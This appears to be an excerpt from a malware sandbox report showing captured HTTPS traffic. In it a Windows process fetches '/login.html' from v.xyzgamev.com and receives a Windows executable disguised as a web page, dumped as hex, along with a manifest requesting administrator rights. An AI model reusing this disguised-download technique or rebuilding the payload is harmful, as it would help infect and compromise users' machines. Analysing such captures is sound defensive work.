                                                                                                                          2022-05-21 07:33:05 UTC2970INData Raw: 24 51 85 bc fa 85 02 56 ea 05 19 52 34 5a 3d ad 1e 25 e8 b7 b9 ef 2d b0 d9 1a 8e 77 e8 84 34 bb 88 66 90 30 60 14 61 d8 08 81 fe 10 4d b4 01 ff da a8 b2 64 62 df ab 4b 3e 60 34 14 c8 63 83 c4 17 b4 8f dd 43 4e 84 1a 49 70 98 e1 4a dc 9c 9f ac b6 3c e7 56 dc 95 3e f9 71 37 35 19 4d dd fe fd cc 96 cb 47 1a 1b 0b 51 80 3d cc 99 0b e8 50 e8 4a 53 3b 67 dd 63 f9 eb 07 97 d0 2a a9 78 b5 ce 97 ce 61 df df 1c c1 bb 42 c4 5b 98 b1 f6 ba 3b f6 f5 84 84 10 6e ba 37 63 63 e3 69 91 47 c1 9a 18 0a 23 77 30 f4 cb 4a 84 9a ee aa f8 86 86 20 43 18 ec 48 b8 65 5a 3f 36 02 33 69 dc de 35 18 a9 71 54 61 11 09 4e 05 85 c3 91 68 a8 42 1d df 4b e2 62 0f be 1e 59 1e cb 75 46 b6 f0 e1 5f 15 8f 6a 74 4d 78 c1 e3 79 21 ab 7b 35 fe fb 56 bb 83 87 2d 29 91 c3 46 d0 3b 10 fc ac cc 5b
                                                                                                                          Data Ascii: $QVR4Z=%-w4f0`aMdbK>`4cCNIpJ<V>q75MGQ=PJS;gc*xaB[;n7cciG#w0J CHeZ?63i5qTaNhBKbYuF_jtMxy!{5V-)F;[
                                                                                                                          2022-05-21 07:33:05 UTC2986INData Raw: 98 94 a0 b4 88 32 0e f9 68 2b c6 c2 c0 45 95 82 0a 4f c8 a0 21 ea ee bb e6 4f 48 b9 f1 b0 7f e3 5f 8a 2e 93 d9 ca 34 8e b8 2c f9 c0 9c 74 72 b7 c9 6c 4c 13 2c 7a 72 f7 b7 93 ce bc 2c 77 13 c8 a4 47 97 65 f0 82 ba 54 61 ec 26 c8 f2 47 39 6a 31 65 a0 b6 d3 37 30 73 a6 02 7e a5 80 b0 31 62 70 67 39 58 f4 6e 44 e6 90 f0 a1 85 99 f4 af 8e 53 0c 73 b4 0a 9c 15 ba 33 22 4b ff 73 49 16 31 db 8a 96 98 04 53 a6 24 fc 07 9b 45 0e 9d d1 4b e2 0e cd 41 46 c7 71 a3 35 b2 26 5f 37 80 fb 99 79 75 c5 f2 4e 11 d8 20 13 8a e6 95 c0 f2 54 68 44 69 a3 45 39 d5 5b e4 4f 25 dd ea 95 8c b5 15 60 d6 33 f3 d5 95 2e e9 95 02 05 bc e1 7c a6 66 96 d2 f3 ab fd ae d2 06 a4 35 0f 6c b1 62 97 07 d8 7b 34 31 90 d8 68 0b 80 75 d1 27 84 e8 f2 da c2 c3 07 c7 78 36 b1 a2 15 da 47 2e bb 53 a3
                                                                                                                          Data Ascii: 2h+EO!OH_.4,trlL,zr,wGeTa&G9j1e70s~1bpg9XnDSs3"KsI1S$EKAFq5&_7yuN ThDiE9[O%`3.|f5lb{41hu'x6G.S
                                                                                                                          2022-05-21 07:33:05 UTC3002INData Raw: 19 a7 ca 99 6e 6e 4d a5 90 2d 9a 9c 27 2f c4 2b 67 b5 a9 f1 e7 9b 6c 21 5c 7d 9b d7 7d 11 91 70 bb 02 d2 ca 42 3c f2 34 67 00 a6 90 49 c5 1e 88 54 ec 57 23 9e a8 75 d2 69 80 23 25 b6 9f bb fd 85 b1 5a 15 5a 74 6d 2d c2 5d bf 84 18 14 10 ab d5 68 00 85 9b 32 8f b5 8b c1 2f e9 01 5f 12 eb 1a e3 e1 f2 d4 31 0f de c3 10 01 e2 5a 7e 87 84 fb 24 ae f7 d3 23 fb ca 65 70 c9 73 f0 63 aa ab aa 30 f0 79 d7 ed 15 f0 38 09 1a 2a 1c 44 14 7b 78 db 9a 34 5b 67 34 91 ba 3a 46 61 64 19 0c 73 3a a3 43 94 27 41 04 fa 5f 26 ff 26 08 84 05 b1 20 a3 cb 18 13 a7 af 40 40 19 e8 28 ee b9 49 c8 b5 05 12 03 36 2e 71 6f 8e fa 63 3f b7 77 f6 b4 72 3d fb 46 0b 01 55 62 f1 7f c3 cb 96 e3 73 30 2b 80 e4 a4 97 08 29 13 6e f5 62 f9 da 90 fd 6f 39 c0 44 00 cb 67 c3 cc 49 f1 40 2e e5 8b c1
                                                                                                                          Data Ascii: nnM-'/+gl!\}}pB<4gITW#ui#%ZZtm-]h2/_1Z~$#epsc0y8*D{x4[g4:Fads:C'A_&& @@(I6.qoc?wr=FUbs0+)nbo9DgI@.
                                                                                                                          2022-05-21 07:33:05 UTC3018INData Raw: 61 3e bb a0 11 48 f5 40 fc ca dc 20 de 29 13 c0 1f 3a 22 bc 8a 2f 6b c1 58 c8 33 cd 0c e0 61 b2 8c 7a aa 37 75 71 29 be 32 fd 29 c8 f2 8a 1d cf 93 d6 4d 60 36 03 0d 2f 4f 72 a9 63 e6 1b fd 8e c8 98 7a ba 44 fc 8e fa f2 79 81 6e 75 84 89 5e 9e 5b 62 2c b9 03 f4 7d 60 9f 16 cf 71 0e 7d da 61 f2 38 79 5d bc ad f9 58 35 5b eb 1a fd ee d1 5c 54 c3 a8 ac 95 0f a2 ff 15 da ba 38 7d 5c 2f e2 ac 09 ea 38 2e 03 72 d6 07 b2 f3 59 8b ce 90 6c 88 f2 20 f5 3e 74 87 0f cb 06 39 92 cf 59 cd bf 0c 68 1b cf 12 93 6e de 2a 55 ba 2a 6c d3 97 1e 5b a1 25 09 a6 1e c8 82 f9 e9 02 12 e2 11 5e 78 85 44 40 bc 63 bf 0d c0 45 27 ed f5 f6 3d 20 77 16 c5 9b 1f 9c 00 e5 f3 b0 ab c5 af 71 da c4 23 68 89 56 cd ed b3 12 95 c2 3d a3 34 e9 60 19 86 7a b2 e8 24 29 15 16 74 95 15 b4 b9 a7 95
                                                                                                                          Data Ascii: a>H@ ):"/kX3az7uq)2)M`6/OrczDynu^[b,}`q}a8y]X5[\T8}\/8.rYl >t9Yhn*U*l[%^xD@cE'= wq#hV=4`z$)t
                                                                                                                          2022-05-21 07:33:05 UTC3034INData Raw: 0d d7 c6 62 ab 98 37 1a 2c 9c 3d 17 e0 0e 39 45 58 13 ec 0c 9c b5 37 98 64 ac 6c d8 ab fe 5f 8f 1f b6 84 9d 6b 44 4b a6 a5 42 d5 f8 43 71 19 36 7e 0c b0 1f 60 a3 86 fa cc f9 30 1b c3 21 06 01 de 7b a2 ed 8a 0a 27 26 0a a3 5d 01 2a 79 04 3a 2d 15 2b 4e 4a a1 18 87 18 f0 7d 65 d7 52 64 b6 d3 fa 05 5c 97 f0 54 25 e7 3b 2a b9 db 34 f6 69 28 3d 37 6a 67 49 b1 05 f3 52 65 c9 82 df a1 d2 e0 d6 59 e4 67 5f cb 44 0d 61 ff 03 b1 d8 b5 ee 54 83 33 cd fa 20 08 20 4c d3 af 81 17 40 89 30 00 54 e9 cf 33 f3 d0 cf 5b 21 4c c0 fa fb b4 fc 96 07 59 45 c8 88 28 60 ff 2d ab e4 aa 9d 7b f4 c2 4a 5e 2e dd bd 79 69 c3 a3 f8 03 ce 70 21 78 38 2f 01 db 34 46 f7 da 61 a9 fb 33 39 96 5d 1a 75 4e 0b 2c d3 d2 c8 ec d2 02 e6 88 c0 6a 03 a8 c6 f7 21 eb 20 17 6a dc 37 0c 8e 70 97 57 bb
                                                                                                                          Data Ascii: b7,=9EX7dl_kDKBCq6~`0!{'&]*y:-+NJ}eRd\T%;*4i(=7jgIReYg_DaT3 L@0T3[!LYE(`-{J^.yip!x8/4Fa39]uN,j! j7pW
                                                                                                                          2022-05-21 07:33:05 UTC3050INData Raw: 11 90 04 f3 28 ea b1 5f e2 61 34 e4 36 e1 de 7e 5b 5e b9 72 1f 9a b6 8a 74 98 d1 3b 74 5b 05 91 cb 2f 40 7c a2 11 6e 66 be 76 e0 b9 94 5c 58 ba fe 0a 74 ef b3 01 4a 57 18 67 f3 ff df ab 3d 0d 62 62 13 3d 18 81 87 25 cf 08 48 e6 41 d4 1a 28 b1 c0 34 4e 5e a2 db 96 e7 ce dd 81 ea ef 4f b5 11 6f e7 ee 6b 60 df 89 87 4e 45 ef 8a 27 2e 8a f0 e5 a0 18 9b df f3 76 a5 f1 b0 6e c3 39 8f 2b 81 9c ec 92 63 04 d0 e7 64 34 98 3b 50 6b a1 c4 21 3b 3b ef 7f 78 3a af 2d 2f 27 a6 43 f5 5a d3 6c 9c 7a f3 97 9e 2f 94 f0 ed b9 6e eb 0d 65 bb 60 6d 04 36 6e ba e0 d1 39 28 18 4a d2 91 a1 fc 58 10 e4 da d4 9a 28 31 c0 2e b1 ec c1 9f a6 7f f1 a1 c3 5b b7 b2 e0 83 46 b3 35 a1 56 ac 3e 19 e2 0e dc f3 49 fc 2a 8f 9d 17 a0 e6 07 b3 b4 df fd 4e f5 49 b0 73 4f b2 5b 23 70 fd 46 56 09
                                                                                                                          Data Ascii: (_a46~[^rt;t[/@|nfv\XtJWg=bb=%HA(4N^Ook`NE'.vn9+cd4;Pk!;;x:-/'CZlz/ne`m6n9(JX(1.[F5V>I*NIsO[#pFV
                                                                                                                          2022-05-21 07:33:05 UTC3066INData Raw: 20 20 20 20 20 20 20 20 53 75 70 70 72 69 6d 65 7a 20 63 65 74 20 c3 a9 6c c3 a9 6d 65 6e 74 20 73 69 20 76 6f 74 72 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 61 20 62 65 73 6f 69 6e 20 64 65 20 6c 61 20 76 69 72 74 75 61 6c 69 73 61 74 69 6f 6e 20 70 6f 75 72 20 64 65 73 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 61 69 73 6f 6e 73 20 64 65 20 63 6f 6d 70 61 74 69 62 69 6c 69 74 c3 a9 20 64 65 73 63 65 6e 64 61 6e 74 65 2e 0d 0a 20 20 20 20 20 20 20 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 72 65 71 75 65 73 74 65 64 45 78 65 63 75 74 69 6f 6e 4c 65 76 65 6c 20 20 6c 65 76 65 6c 3d 22 72 65 71 75 69 72 65 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 20 75 69 41 63 63 65 73 73 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 72 65 71 75 65
                                                                                                                          Data Ascii: Supprimez cet lment si votre application a besoin de la virtualisation pour des raisons de compatibilit descendante. --> <requestedExecutionLevel level="requireAdministrator" uiAccess="false" /> </reque


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          27192.168.2.449871104.21.40.196443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:06 UTC3300OUTGET /login.html HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                          Host: v.xyzgamev.com
                                                                                                                          2022-05-21 07:33:06 UTC3300INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:33:06 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Wed, 18 May 2022 14:01:13 GMT
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cbSCr6YFNLIy6ghYJmysWUksKi6AKyZO0VwRIZ6jFJWb12Fen6OokrJVSer8z5LPKQuMZhfPnMpnLSZe%2BTOulVXO6WY%2FFS2MgTlBFYh%2BbKLL2heanNpfTmg3h%2FSPoCQEWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 70eb9f3a6ab2694f-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                          2022-05-21 07:33:06 UTC3301INData Raw: 36 31 65 63 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e8 29 61 ba ac 48 0f e9 ac 48 0f e9 ac 48 0f e9 8b 8e 72 e9 bc 48 0f e9 8b 8e 61 e9 b5 48 0f e9 8b 8e 62 e9 eb 48 0f e9 6f 47 52 e9 af 48 0f e9 ac 48 0e e9 e0 48 0f e9 8b 8e 7d e9 ad 48 0f e9 8b 8e 75 e9 ad 48 0f e9 8b 8e 77 e9 ad 48 0f e9 52 69 63 68 ac 48 0f e9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 32 df 84 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b
                                                                                                                          Data Ascii: 61ecMZ@!L!This program cannot be run in DOS mode.$)aHHHrHaHbHoGRHHH}HuHwHRichHPEL2b!
                                                                                                                          2022-05-21 07:33:06 UTC3302INData Raw: 00 00 10 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 0c 00 00 00 d0 00 00 00 10 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: @@.reloc@B
                                                                                                                          2022-05-21 07:33:06 UTC3303INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:33:06 UTC3304INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:33:06 UTC3306INData Raw: 00 53 e8 9e fd ff ff a1 28 81 00 10 85 c0 74 06 57 6a 00 53 ff d0 85 f6 74 05 83 fe 03 75 26 57 56 53 e8 7e fd ff ff 85 c0 75 03 21 45 e4 83 7d e4 00 74 11 a1 28 81 00 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 c7 45 fc fe ff ff ff 8b 45 e4 eb 1d 8b 45 ec 8b 08 8b 09 50 51 e8 ed 14 00 00 59 59 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 e8 3c 15 00 00 c3 83 7c 24 08 01 75 05 e8 dc 16 00 00 ff 74 24 04 8b 4c 24 10 8b 54 24 0c e8 ed fe ff ff 59 c2 0c 00 55 8b ec 81 ec 28 03 00 00 a3 e0 ad 00 10 89 0d dc ad 00 10 89 15 d8 ad 00 10 89 1d d4 ad 00 10 89 35 d0 ad 00 10 89 3d cc ad 00 10 66 8c 15 f8 ad 00 10 66 8c 0d ec ad 00 10 66 8c 1d c8 ad 00 10 66 8c 05 c4 ad 00 10 66 8c 25 c0 ad 00 10 66 8c 2d bc ad 00 10 9c 8f 05 f0 ad 00 10 8b 45 00 a3 e4 ad 00 10 8b 45 04 a3 e8
                                                                                                                          Data Ascii: S(tWjStu&WVS~u!E}t(tWVSEEEEPQYYeE3<|$ut$L$T$YU(5=fffff%f-EE
                                                                                                                          2022-05-21 07:33:06 UTC3307INData Raw: ff 35 10 a0 00 10 ff 15 3c 80 00 10 85 c0 75 19 ff 35 48 b0 00 10 e8 79 ff ff ff 59 50 ff 35 10 a0 00 10 ff 15 44 80 00 10 c3 a1 0c a0 00 10 83 f8 ff 74 16 50 ff 35 50 b0 00 10 e8 54 ff ff ff 59 ff d0 83 0d 0c a0 00 10 ff a1 10 a0 00 10 83 f8 ff 74 0e 50 ff 15 48 80 00 10 83 0d 10 a0 00 10 ff e9 5a 14 00 00 6a 0c 68 b0 92 00 10 e8 9e 0f 00 00 68 60 81 00 10 ff 15 34 80 00 10 89 45 e4 8b 75 08 c7 46 5c 40 a0 00 10 33 ff 47 89 7e 14 85 c0 74 24 68 50 81 00 10 50 8b 1d 04 80 00 10 ff d3 89 86 f8 01 00 00 68 70 81 00 10 ff 75 e4 ff d3 89 86 fc 01 00 00 89 7e 70 c6 86 c8 00 00 00 43 c6 86 4b 01 00 00 43 b8 30 a5 00 10 89 46 68 50 ff 15 4c 80 00 10 6a 0c e8 0e 15 00 00 59 83 65 fc 00 8b 45 0c 89 46 6c 85 c0 75 08 a1 20 a5 00 10 89 46 6c ff 76 6c e8 7f 1d 00 00
                                                                                                                          Data Ascii: 5<u5HyYP5DtP5PTYtPHZjhh`4EuF\@3G~t$hPPhpu~pCKC0FhPLjYeEFlu Flvl
                                                                                                                          2022-05-21 07:33:06 UTC3308INData Raw: 0c e8 44 2d 00 00 8b f8 85 ff 59 75 27 39 05 54 b0 00 10 76 1f 56 ff 15 5c 80 00 10 8d 86 e8 03 00 00 3b 05 54 b0 00 10 76 03 83 c8 ff 83 f8 ff 8b f0 75 c9 8b c7 5f 5e c3 56 57 33 f6 6a 00 ff 74 24 14 ff 74 24 14 e8 c1 2d 00 00 8b f8 83 c4 0c 85 ff 75 27 39 05 54 b0 00 10 76 1f 56 ff 15 5c 80 00 10 8d 86 e8 03 00 00 3b 05 54 b0 00 10 76 03 83 c8 ff 83 f8 ff 8b f0 75 c1 8b c7 5f 5e c3 56 57 33 f6 ff 74 24 10 ff 74 24 10 e8 99 2e 00 00 8b f8 85 ff 59 59 75 2d 39 44 24 10 74 27 39 05 54 b0 00 10 76 1f 56 ff 15 5c 80 00 10 8d 86 e8 03 00 00 3b 05 54 b0 00 10 76 03 83 c8 ff 83 f8 ff 8b f0 75 be 8b c7 5f 5e c3 6a 54 68 18 93 00 10 e8 e0 09 00 00 33 ff 89 7d fc 8d 45 9c 50 ff 15 6c 80 00 10 c7 45 fc fe ff ff ff 6a 28 6a 20 5e 56 e8 40 ff ff ff 59 59 3b c7 0f 84
                                                                                                                          Data Ascii: D-Yu'9TvV\;Tvu_^VW3jt$t$-u'9TvV\;Tvu_^VW3t$t$.YYu-9D$t'9TvV\;Tvu_^jTh3}EPlEj(j ^V@YY;
                                                                                                                          2022-05-21 07:33:06 UTC3310INData Raw: 74 4b 3c 09 74 47 85 db 74 3d 85 d2 0f be c0 50 74 23 e8 20 2d 00 00 85 c0 59 74 0d 8a 06 8b 4d 0c ff 45 0c 88 01 46 ff 07 8b 4d 0c 8a 06 ff 45 0c 88 01 eb 0d e8 fd 2c 00 00 85 c0 59 74 03 46 ff 07 ff 07 8b 55 0c 46 e9 56 ff ff ff 85 d2 74 07 c6 02 00 42 89 55 0c ff 07 8b 4d 10 e9 0e ff ff ff 8b 45 08 85 c0 5e 5b 74 03 83 20 00 ff 01 c9 c3 55 8b ec 83 ec 0c 53 33 db 39 1d 8c ba 00 10 56 57 75 05 e8 fb 1b 00 00 68 04 01 00 00 be 58 b0 00 10 56 53 88 1d 5c b1 00 10 ff 15 74 80 00 10 a1 98 ba 00 10 3b c3 89 35 30 b0 00 10 74 07 38 18 89 45 fc 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0e fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 ad f9 ff ff 8b f0 3b f3 59 74 29 8b 55 fc 8d 45
                                                                                                                          Data Ascii: tK<tGt=Pt# -YtMEFME,YtFUFVtBUME^[t US39VWuhXVS\t;50t8EuuUEPSS}E=?sJMsB;r6P;Yt)UE
                                                                                                                          2022-05-21 07:33:06 UTC3311INData Raw: 33 c0 c3 cc cc cc 68 30 28 00 10 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 00 a0 00 10 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc 83 ec 14 53 8b 5c 24 20 55 56 8b 73 08 33 35 00 a0 00 10 57 8b 06 83 f8 fe c6 44 24 13 00 c7 44 24 18 01 00 00 00 8d 7b 10 74 0d 8b 4e 04 03 cf 33 0c 38 e8 98 e7 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 88 e7 ff ff 8b 44 24 28 f6 40 04 66 0f 85 1f 01 00 00 8b 6b 0c 83 fd fe 8b 4c 24 30 8d 54 24 1c 89 44 24 1c 89 4c 24 20 89 53 fc 74 5e 8d 44 6d 00 8b 4c 86 14 85 c9 8d 5c 86 10 8b 03 89 44 24 14 74 16 8b d7 e8 5c 2b 00 00 85 c0 c6 44 24 13 01 7c 44 7f 4c 8b 44 24 14
                                                                                                                          Data Ascii: 3h0(d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QS\$ UVs35WD$D${tN38NF38D$(@fkL$0T$D$L$ St^DmL\D$t\+D$|DLD$
                                                                                                                          2022-05-21 07:33:06 UTC3312INData Raw: f5 80 a1 00 10 39 1e 74 04 8b c7 eb 6e 6a 18 e8 da ef ff ff 59 8b f8 3b fb 75 0f e8 00 02 00 00 c7 00 0c 00 00 00 33 c0 eb 51 6a 0a e8 59 00 00 00 59 89 5d fc 39 1e 75 2c 68 a0 0f 00 00 57 e8 a5 06 00 00 59 59 85 c0 75 17 57 e8 10 ef ff ff 59 e8 ca 01 00 00 c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 f5 ee ff ff 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 72 fa ff ff c3 6a 0a e8 2a ff ff ff 59 c3 55 8b ec 8b 45 08 56 8d 34 c5 80 a1 00 10 83 3e 00 75 13 50 e8 24 ff ff ff 85 c0 59 75 08 6a 11 e8 2d e6 ff ff 59 ff 36 ff 15 b0 80 00 10 5e 5d c3 8b 44 24 04 a3 d0 b5 00 10 c3 55 8d ac 24 58 fd ff ff 81 ec 28 03 00 00 a1 00 a0 00 10 33 c5 89 85 a4 02 00 00 56 89 85 88 00 00 00 89 8d 84 00 00 00 89 95 80 00 00 00 89 5d 7c 89 75 78 89 7d 74 66 8c 95
                                                                                                                          Data Ascii: 9tnjY;u3QjYY]9u,hWYYuWY]>WYEErj*YUEV4>uP$Yuj-Y6^]D$U$X(3V]|ux}tf
                                                                                                                          2022-05-21 07:33:06 UTC3314INData Raw: a1 d8 b5 00 10 eb 60 ff 77 5c 8b d3 e8 60 ff ff ff 8b f0 83 c6 08 8b 06 eb 5a 8b c3 83 e8 0f 74 3c 83 e8 06 74 2b 48 74 1c e8 99 fc ff ff c7 00 16 00 00 00 33 c0 50 50 50 50 50 e8 28 fc ff ff 83 c4 14 eb ae be e0 b5 00 10 a1 e0 b5 00 10 eb 16 be dc b5 00 10 a1 dc b5 00 10 eb 0a be e4 b5 00 10 a1 e4 b5 00 10 c7 45 e4 01 00 00 00 50 e8 63 e4 ff ff 89 45 e0 59 33 c0 83 7d e0 01 0f 84 d8 00 00 00 39 45 e0 75 07 6a 03 e8 6f e3 ff ff 39 45 e4 74 07 50 e8 96 fa ff ff 59 33 c0 89 45 fc 83 fb 08 74 0a 83 fb 0b 74 05 83 fb 04 75 1b 8b 4f 60 89 4d d4 89 47 60 83 fb 08 75 40 8b 4f 64 89 4d d0 c7 47 64 8c 00 00 00 83 fb 08 75 2e 8b 0d b8 a0 00 10 89 4d dc 8b 0d bc a0 00 10 8b 15 b8 a0 00 10 03 ca 39 4d dc 7d 19 8b 4d dc 6b c9 0c 8b 57 5c 89 44 11 08 ff 45 dc eb db e8
                                                                                                                          Data Ascii: `w\`Zt<t+Ht3PPPPP(EPcEY3}9Eujo9EtPY3EttuO`MG`u@OdMGdu.M9M}MkW\DE
                                                                                                                          2022-05-21 07:33:06 UTC3315INData Raw: 65 fc 00 8d 46 6c 8b 3d 20 a5 00 10 e8 69 ff ff ff 89 45 e4 c7 45 fc fe ff ff ff e8 02 00 00 00 eb c1 6a 0c e8 d7 f4 ff ff 59 8b 75 e4 c3 2d a4 03 00 00 74 22 83 e8 04 74 17 83 e8 0d 74 0c 48 74 03 33 c0 c3 b8 04 04 00 00 c3 b8 12 04 00 00 c3 b8 04 08 00 00 c3 b8 11 04 00 00 c3 53 55 56 57 bd 01 01 00 00 8b f0 55 33 ff 8d 5e 1c 57 53 e8 42 1f 00 00 89 7e 04 89 7e 08 89 7e 0c 33 c0 8d 7e 10 ab ab ab b8 30 a5 00 10 83 c4 0c 2b c6 8a 0c 18 88 0b 43 4d 75 f7 8d 8e 1d 01 00 00 be 00 01 00 00 8a 14 01 88 11 41 4e 75 f7 5f 5e 5d 5b c3 55 8d ac 24 64 fb ff ff 81 ec 1c 05 00 00 a1 00 a0 00 10 33 c5 89 85 98 04 00 00 53 57 8d 45 84 50 ff 76 04 ff 15 bc 80 00 10 85 c0 bf 00 01 00 00 0f 84 ef 00 00 00 33 c0 88 84 05 98 03 00 00 40 3b c7 72 f4 8a 45 8a 84 c0 c6 85 98
                                                                                                                          Data Ascii: eFl= iEEjYu-t"ttHt3SUVWU3^WSB~~~3~0+CMuANu_^][U$d3SWEPv3@;rE
                                                                                                                          2022-05-21 07:33:06 UTC3316INData Raw: 08 eb 03 89 73 08 33 c0 8d 7b 10 ab ab ab eb b2 39 35 28 b6 00 10 0f 85 90 fe ff ff 83 c8 ff 8b 4d fc 5f 5e 33 cd 5b e8 a2 d2 ff ff c9 c3 6a 14 68 38 94 00 10 e8 68 ea ff ff 83 4d e0 ff e8 ec db ff ff 8b f8 89 7d dc e8 96 fc ff ff 8b 5f 68 8b 75 08 e8 b1 fd ff ff 89 45 08 3b 43 04 0f 84 57 01 00 00 68 20 02 00 00 e8 75 df ff ff 59 8b d8 85 db 0f 84 46 01 00 00 b9 88 00 00 00 8b 77 68 8b fb f3 a5 83 23 00 53 ff 75 08 e8 f2 fd ff ff 59 59 89 45 e0 85 c0 0f 85 fc 00 00 00 8b 75 dc ff 76 68 ff 15 58 80 00 10 85 c0 75 11 8b 46 68 3d 30 a5 00 10 74 07 50 e8 97 de ff ff 59 89 5e 68 53 8b 3d 4c 80 00 10 ff d7 f6 46 70 02 0f 85 ea 00 00 00 f6 05 54 ab 00 10 01 0f 85 dd 00 00 00 6a 0d e8 96 ef ff ff 59 83 65 fc 00 8b 43 04 a3 38 b6 00 10 8b 43 08 a3 3c b6 00 10 8b
                                                                                                                          Data Ascii: s3{95(M_^3[jh8hM}_huE;CWh uYFwh#SuYYEuvhXuFh=0tPY^hS=LFpTjYeC8C<
